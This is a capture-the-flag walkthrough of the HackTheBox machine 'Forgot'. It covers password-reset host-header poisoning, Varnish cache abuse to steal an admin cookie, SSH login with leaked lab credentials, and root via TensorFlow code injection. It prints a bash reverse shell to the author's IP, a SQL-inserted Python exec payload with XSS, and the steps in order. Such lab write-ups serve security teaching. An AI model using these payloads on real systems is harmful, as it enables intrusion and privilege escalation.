# Forgot Forgot is a medium rated difficulty Linux machine from [HackTheBox](https://app.hackthebox.com/machines/Forgot) created by MrR3boot. This box is pretty confusing and it’s pretty slow, you need a lot of patience to complete this one. In the current post my IP is 10.10.14.18 and the target’s IP is 10.129.228.104. ### Gathering Information This step is always the same, you must ping the machine to see if is alive, and then use Nmap to scan all the ports to avoid surprises. {% code title="Local Terminal" %} ```bash nmap -p- --open -T5 -v -n 10.129.228.104 ``` {% endcode %}

{% code title="Local Terminal" %} ```bash nmap -sC -sV -p 22,80 10.129.228.104 ``` {% endcode %}

It’s just a website, but there is something weird about it. {% code title="Local Terminal" %} ```bash whatweb http://10.129.228.104 ``` {% endcode %}

Relevant information: Varnish 6.2, after exploring you should search about that.

* Browser:

Fragment of the main page source code (CTRL+U)

Add more information to your notes {user : robert-dev-14522}, still, we don’t have much information, so our best option is to fuzz the website and try to obtain more. {% code title="Local Terminal" %} ```bash wfuzz -c -t 200 –hc=404 -w /usr/share/wordlists/dirb/big.txt http://10.129.228.104/FUZZ ``` {% endcode %}

My target machine explodes, new target IP: **10.129.219.117** * Browser:

We can see that the website sends something to the user, we need to intercept it, by using one terminal, Burpsuite, and your browser. ### User Interception Step Before, from **** take the username of “robert-dev” using view:source (CTRL+U) or try **curl | grep “Q1 release fix by”** {% code title="Local Terminal" %} ```bash nc -lvnp 443 ``` {% endcode %} * Burpsuite: {INCERCEPT ON} * Browser: {username: robert-dev-14522} {PRESS RESET} * Burpsuite: Change host to your IP address and netcat port, like 10.10.14.18:443

* Burpsuite: {Press Forward} * Burpsuite: {Intercept OFF}

Wait around 1-2 minutes. at netcat you will receive this. Copy the token url.

* Browser:

Change password to anything (Here: pass123)

Now we have to login. * Browser:

This machine have a timer where it changes the username of “robert-dev”, and it will fail if you are slow. Repeat everything from “User Interception Step”

### Login through SSH This version of Varnish have an issue with the cache (this was hard to find), we will use it to intercept and get the credentials to login directly to the machine.

view:source of home, /admin_tickets sounds like an important subdomain

First, we need to submit a ticket to a valid important URL from the machine plus a fictional directory, and the best place is static, where the .JS files are saved. After this, we will get the admin’s cookie to go to /admin\_tickets * Browser:

Here you have to wait around two or three minutes, If you want now, you can retrieve your **user cookie** to compare, by using Burpsuite, intercepting a site like while logged in. And after waiting, we can get the cookie from the fictional page {% code title="Local Terminal" %} ```bash curl -I http://10.129.219.117/static/directory ``` {% endcode %}

Admin cookie, if this fails, repeats by summiting a new ticket with a new folder

Now that we have the administrator’s cookie, we have to use Burpsuite to change the cookie when going to /admin\_tickets * Burpsuite {Intercept ON} * Browser: * Burpsuite {Replace Cookie}

* Burpsuite {Forward} * Burpsuite {Intercept OFF}

And we are in! Look, there is an ssh issue

We have to try to login using these credentials, but before we notice that this website loves to add an Uppercase everywhere… so we are going to get the information from the source

view:source of /admin_tickets… {diego:dCb#1!x0%gjq}

{% code title="Local Terminal" %} ```bash ssh diego@10.129.219.117 #password: dCb#1!x0%gjq ``` {% endcode %} Now our LocalTerminal \[**Term**] is the Target Terminal \[**Diego**]

### Privilege Escalation Now we want to become root, first we need to know what applications we can execute as root. {% code title="Target Terminal Diego" %} ```bash sudo -l ``` {% endcode %}

{% code title="Target Terminal Diego" %} ```bash cat /opt/security/ml_security.py ``` {% endcode %} By exploring the code, we found two things, it reads a MySQL data base, and by the version of TensorFlow, we can [inject code in saved\_model\_cli](https://github.com/advisories/GHSA-75c9-jrh4-79mc) to execute another bash file. I found an explanation and steps from this [post](https://breached.vc/Thread-Forgot-HTB-Discussion?page=4).

{% code title="Target Terminal Diego" %} ```bash mysql -u diego -p #pass: dCb#1!x0%gjq ``` {% endcode %} {% code title="Target Terminal Diego (SQL)" %} ```sql SHOW DATABASE; use app; show tables; SELECT * from users; ``` {% endcode %}

Still, I couldn’t do anything else with this information… {% code title="Target Terminal Diego" %} ```bash cd /dev/shm vi script.sh ``` {% endcode %} {% code title="Content of script.sh" %} ```bash #!/bin/bash bash -i >& /dev/tcp/10.10.14.18/443 0>&1 ``` {% endcode %} {% code title="Target Terminal Diego" %} ```bash chmod 777 script.sh mysql -u diego -p #pass: dCb#1!x0%gjq ``` {% endcode %} From here, we need three terminal, two connected to the target as Diego, one to use the MySQL queries \[**MySQL**], the other one to execute ml\_security.py \[**Diego**], and one Local Terminal \[**Term**] {% code title="Target Terminal \[MySQL]" %} ```sql use app; insert into escalate values (“TEXT”,”TEXT”,”TEXT”,’hello=exec(“””\nimport os\nos.system(“/dev/shm/script.sh”)\nprint(“&ErrMsg=%3Cimg%20src=%22http://imgur.com/bTkSe.png%22%20/%3E%3CSCRIPT%3Ealert%28%22xss%22%29%3C/SCRIPT%3E”)”””)’); ``` {% endcode %} {% code title="Local Terminal \[Term]" %} ```bash nc -nlvp 443 ``` {% endcode %} {% code title="Target Terminal \[Diego]" %} ```bash sudo /opt/security/ml_security.py ``` {% endcode %}

{% code title="Target Root" %} ```bash cd /root ls cat root.txt ``` {% endcode %}